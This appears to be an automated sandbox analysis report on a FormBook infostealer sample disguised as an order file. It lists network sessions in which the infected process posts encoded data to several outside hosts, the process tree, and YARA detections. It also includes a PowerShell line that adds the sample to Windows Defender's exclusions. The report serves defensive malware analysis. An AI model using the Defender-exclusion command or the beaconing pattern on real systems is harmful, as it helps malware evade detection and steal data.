                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      28 | 192.168.2.4 | 49770 | 217.160.0.87 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:19.333043098 CEST | 425 | OUT | GET /4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:19.975766897 CEST  770                IN         HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Content-Length: 626
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:19 GMT
                                                      Server: Apache
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      29          192.168.2.4  49771        84.32.84.32     80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:25.079884052 CEST  682                OUT        POST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjY70Ckau3SavvoL7SUxTGyIG+twSNcDon5wWltPhjG9xIIn+Stb2j6vu2cNaBmpwh/iJMS7wLQs7lJ8z715KImGr84o9I9r6yo+KhIe98gQT111v3HXwtm7cz9Jrs2Wnu2/WHGZbRY2uOYvTsHiW7+4eNv1m5qQML57arjCshwHqsgU89e4jZiw==


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      30          192.168.2.4  49772        84.32.84.32     80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:28.227508068 CEST  702                OUT        POST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjYaECh9C3T6voir7SGxTKyJ6+t1qdcVYn6Vylq85jB9xIc3+TwL2o6vi+cIiBmpkh/j5MTIIIR87nGcz5x5KImGr84stx9ryyrO6hJ8VztwTyy1v3WHwpm7cF9MPK2Uvu26qHGN2HR2uIGfSGIjuympWC3WK+q0M81dLxyzN2iHOf9T1JT7eQ53V9YMr2aomYEQPJmVXhEoU=


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      31          192.168.2.4  49773        84.32.84.32     80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:30.811510086 CEST  10784              OUT        POST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      32          192.168.2.4  49774        84.32.84.32     80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:33.361753941 CEST  416                OUT        GET /hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:33.812366009 CEST  1236               IN         HTTP/1.1 200 OK
                                                      Server: hcdn
                                                      Date: Wed, 03 Jul 2024 15:46:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 10072
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443"; ma=86400
                                                      x-hcdn-request-id: d07753e343f9acdaf7a0a1d2e64992e7-bos-edge1
                                                      Expires: Wed, 03 Jul 2024 15:46:32 GMT
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      33          192.168.2.4  49775        38.47.232.233   80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:39.233753920 CEST  673                OUT        POST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=vhERzjDaT0Y4HpVk8K0Jzn/mNZcrvlZeFORlY6Mc3wHGIzJYtrZKFcITrUg6wD+7U/RfXuL2lUhppCr5wWFPF0TN5UaMLQftglpAAiVf+zCjafH6QOb2r2cMTCXcdIcVRFI+tp4zecjrSaIpbU5Y7F3ACrf1a2FKfFr11ZCEe6BvHSL62Nd2fJF5NT+X7hbeiA==
                                                      Jul 3, 2024 17:46:40.123665094 CEST  289                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:39 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      34          192.168.2.4  49776        38.47.232.233   80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:41.769730091 CEST  693                OUT        POST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=vhERzjDaT0Y4V5Fk/pMJ2H/lH5crh1ZaFOVlY7Yy3CjGIW1YspxKCcITzkgmuz+GU/ttXvb2lU1ppDb5xltIFkTD20aCVgftglpAAiR1+zajasv6C/b1lWcPFyXcZIdcRFIMttwZeeLrSb4pbBNbxF3GO7eGRHUvG1359qaqZrxyCUagn88hNJhKQU3j2imX5AZr/mUYOqfQVXRunQ4YI00=
                                                      Jul 3, 2024 17:46:42.890132904 CEST  289                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:42 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      35          192.168.2.4  49777        38.47.232.233   80                3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:44.296518087 CEST  10775              OUT        POST /0ag0/ HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.ybw73.top
                                                      Referer: http://www.ybw73.top/0ag0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:45.266102076 CEST  289                IN         HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:45 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      36  192.168.2.4  49778  38.47.232.233  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:46.825571060 CEST  413  OUT  GET /0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.ybw73.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:47.722235918 CEST  289  IN  HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 15:46:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      37  192.168.2.4  49779  74.208.236.247  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:52.771785975 CEST  691  OUT  POST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=ho9YEEy0SBf0wM61TKSChu16J+YI6ML7UM9S8Rm2kbqN739IjLJjUuscemvHwIVOJpFG3ahdgI5ry6odJoDk+W/7Vd6suWyQ6qUOrd82LvxiFgx7US1bNbkvvpGA9ZecIaVEYvi7m4tMrlgRABoLm2LmABFq49+x5g0aKJVwRBoo930l/MpMY6Nx6Mxu6es7mw==
                                                      Jul 3, 2024 17:46:53.361476898 CEST  580  IN  HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:53 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      38  192.168.2.4  49780  74.208.236.247  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:55.347995043 CEST  711  OUT  POST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=ho9YEEy0SBf0wtK1Wt+CnO15FeYIoMLFUMxS8TKmkpeN6SRIgPVjRuscMGvC0IVFJpIz3fZdgItry7YdKff79m/5c96qtmyQ6qUOrcYILvpiFQB7V2hUSrksqpGAsJeYIaV2Yrjmm6lMrlQRO18Is2KtdREqxMH70AdpF+8eQQoK1Rl/u9IbK6pCnL4a3dRy9+gzj9+oExWt6fY8GqJbZ0s=
                                                      Jul 3, 2024 17:46:55.851665020 CEST  580  IN  HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:55 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      39  192.168.2.4  49781  74.208.236.247  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:46:57.875768900 CEST  10793  OUT  POST /tqvk/ HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.kaps4kancer.org
                                                      Referer: http://www.kaps4kancer.org/tqvk/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:58.458940983 CEST  580  IN  HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:58 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      40  192.168.2.4  49782  74.208.236.247  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:47:00.404169083 CEST  419  OUT  GET /tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.kaps4kancer.org
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:47:00.950731993 CEST  770  IN  HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Content-Length: 626
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:47:00 GMT
                                                      Server: Apache
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                      41  192.168.2.4  49783  84.32.84.32  80  3716  C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:47:14.092008114 CEST  682  OUT  POST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjY70Ckau3SavvoL7SUxTGyIG+twSNcDon5wWltPhjG9xIIn+Stb2j6vu2cNaBmpwh/iJMS7wLQs7lJ8z715KImGr84o9I9r6yo+KhIe98gQT111v3HXwtm7cz9Jrs2Wnu2/WHGZbRY2uOYvTsHiW7+4eNv1m5qQML57arjCshwHqsgU89e4jZiw==


                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                      42  192.168.2.4  49784  84.32.84.32  80
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Jul 3, 2024 17:47:17.014297962 CEST  702  OUT  POST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=Sy6xV0ER6CgjYaECh9C3T6voir7SGxTKyJ6+t1qdcVYn6Vylq85jB9xIc3+TwL2o6vi+cIiBmpkh/j5MTIIIR87nGcz5x5KImGr84stx9ryyrO6hJ8VztwTyy1v3WHwpm7cF9MPK2Uvu26qHGN2HR2uIGfSGIjuympWC3WK+q0M81dLxyzN2iHOf9T1JT7eQ53V9YMr2aomYEQPJmVXhEoU=


                                                      Target ID:0
                                                      Start time:11:43:06
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0x810000
                                                      File size:1'015'808 bytes
                                                      MD5 hash:860575AA9868349D8CBDBE70D45098C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:11:43:08
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0xf40000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:11:43:08
                                                      Start date:03/07/2024
                                                      Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
                                                      Imagebase:0xdc0000
                                                      File size:1'015'808 bytes
                                                      MD5 hash:860575AA9868349D8CBDBE70D45098C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:11:43:09
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:11:43:46
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe"
                                                      Imagebase:0x830000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:11:43:48
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\fc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                      Imagebase:0xcc0000
                                                      File size:22'528 bytes
                                                      MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
